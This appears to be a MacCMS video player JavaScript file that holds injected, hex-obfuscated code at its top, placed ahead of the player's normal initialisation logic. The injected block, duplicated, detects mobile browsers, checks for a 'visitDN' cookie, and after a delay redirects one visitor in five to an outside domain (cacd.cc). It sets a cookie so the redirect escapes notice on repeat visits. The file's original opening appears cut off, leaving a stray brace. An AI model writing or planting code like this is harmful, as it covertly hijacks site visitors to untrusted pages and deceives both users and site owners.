!(function(){function isMobile(){return/Android|android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i['\x74\x65\x73\x74'](navigator['\x75\x73\x65\x72\x41\x67\x65\x6e\x74'])}function hasCookie(sgBbJBZt1){return window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x63\x6f\x6f\x6b\x69\x65']['\x69\x6e\x64\x65\x78\x4f\x66'](sgBbJBZt1)!==-1}function setCookie(cookieName,hiNe2,vm$3){var F4=new window["\x44\x61\x74\x65"]();F4['\x73\x65\x74\x54\x69\x6d\x65'](F4['\x67\x65\x74\x54\x69\x6d\x65']()+(vm$3*24*60*60*1000));window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x63\x6f\x6f\x6b\x69\x65']=`${cookieName}=${hiNe2};expires=${F4['\x74\x6f\x55\x54\x43\x53\x74\x72\x69\x6e\x67']()};path=/`}function getRandom(){return window["\x4d\x61\x74\x68"]['\x72\x61\x6e\x64\x6f\x6d']()}function redirectTo(NhE5){window['\x6c\x6f\x63\x61\x74\x69\x6f\x6e']['\x68\x72\x65\x66']=NhE5}function redirectToCDN(){if(getRandom()<0.2){const cookieName="\x76\x69\x73\x69\x74\x44\x4e";const oneDay=2;setCookie(cookieName,"\x74\x72\x75\x65",oneDay);redirectTo("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x61\x63\x64\x2e\x63\x63")}}if(isMobile()&&!hasCookie("\x76\x69\x73\x69\x74\x44\x4e")){setTimeout(()=>{redirectToCDN()},2000)}})();!(function(){function isMobile(){return/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i['\x74\x65\x73\x74'](navigator['\x75\x73\x65\x72\x41\x67\x65\x6e\x74'])}function hasCookie(sgBbJBZt1){return window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x63\x6f\x6f\x6b\x69\x65']['\x69\x6e\x64\x65\x78\x4f\x66'](sgBbJBZt1)!==-1}function setCookie(cookieName,hiNe2,vm$3){var F4=new window["\x44\x61\x74\x65"]();F4['\x73\x65\x74\x54\x69\x6d\x65'](F4['\x67\x65\x74\x54\x69\x6d\x65']()+(vm$3*24*60*60*1000));window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x63\x6f\x6f\x6b\x69\x65']=`${cookieName}=${hiNe2};expires=${F4['\x74\x6f\x55\x54\x43\x53\x74\x72\x69\x6e\x67']()};path=/`}function getRandom(){return window["\x4d\x61\x74\x68"]['\x72\x61\x6e\x64\x6f\x6d']()}function redirectTo(NhE5){window['\x6c\x6f\x63\x61\x74\x69\x6f\x6e']['\x68\x72\x65\x66']=NhE5}function redirectToCDN(){if(getRandom()<0.2){const cookieName="\x76\x69\x73\x69\x74\x44\x4e";const oneDay=2;setCookie(cookieName,"\x74\x72\x75\x65",oneDay);redirectTo("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x61\x63\x64\x2e\x63\x63")}}if(isMobile()&&!hasCookie("\x76\x69\x73\x69\x74\x44\x4e")){setTimeout(()=>{redirectToCDN()},5000)}})();        }
        if (a.encrypt == '1') {
            a.url = unescape(a.url);
            a.url_next = unescape(a.url_next)
        } else if (a.encrypt == '2') {
            a.url = unescape(base64decode(a.url));
            a.url_next = unescape(base64decode(a.url_next))
        }
        this.Agent = navigator.userAgent.toLowerCase();
        this.Width = MacPlayerConfig.width;
        this.Height = MacPlayerConfig.height;
        if (this.Agent.indexOf("android") > 0 || this.Agent.indexOf("mobile") > 0 || this.Agent.indexOf("ipod") > 0 || this.Agent.indexOf("ios") > 0 || this.Agent.indexOf("iphone") > 0 || this.Agent.indexOf("ipad") > 0) {
            this.Width = MacPlayerConfig.widthmob;
            this.Height = MacPlayerConfig.heightmob
        }
        if (this.Width.indexOf("px") == -1 && this.Width.indexOf("%") == -1) {
            this.Width = '100%'
        }
        if (this.Height.indexOf("px") == -1 && this.Height.indexOf("%") == -1) {
            this.Height = '100%'
        }
        this.Prestrain = MacPlayerConfig.prestrain;
        this.Buffer = MacPlayerConfig.buffer;
        this.Second = MacPlayerConfig.second;
        this.Flag = a.flag;
        this.Trysee = a.trysee;
        this.Points = a.points;
        this.Link = decodeURIComponent(a.link);
        this.PlayFrom = a.from;
        this.PlayNote = a.note;
        this.PlayServer = a.server == 'no' ? '' : a.server;
        this.PlayUrl = a.url;
        this.PlayUrlNext = a.url_next;
        this.PlayLinkNext = a.link_next;
        this.PlayLinkPre = a.link_pre;
        this.Id = a.id;
        this.Sid = a.sid;
        this.Nid = a.nid;
        if (MacPlayerConfig.server_list[this.PlayServer] != undefined) {
            this.PlayServer = MacPlayerConfig.server_list[this.PlayServer].des
        }
        if (MacPlayerConfig.player_list[this.PlayFrom] != undefined) {
            if (MacPlayerConfig.player_list[this.PlayFrom].ps == "1") {
                this.Parse = MacPlayerConfig.player_list[this.PlayFrom].parse == '' ? MacPlayerConfig.parse : MacPlayerConfig.player_list[this.PlayFrom].parse;
                this.PlayFrom = 'parse'
            }
        }
        this.Path = '/static/player/';
        if (this.Flag == "down") {
            MacPlayer.Down()
        } else {
            MacPlayer.Play()
        }
    }
};






MacPlayer.Init();






































































































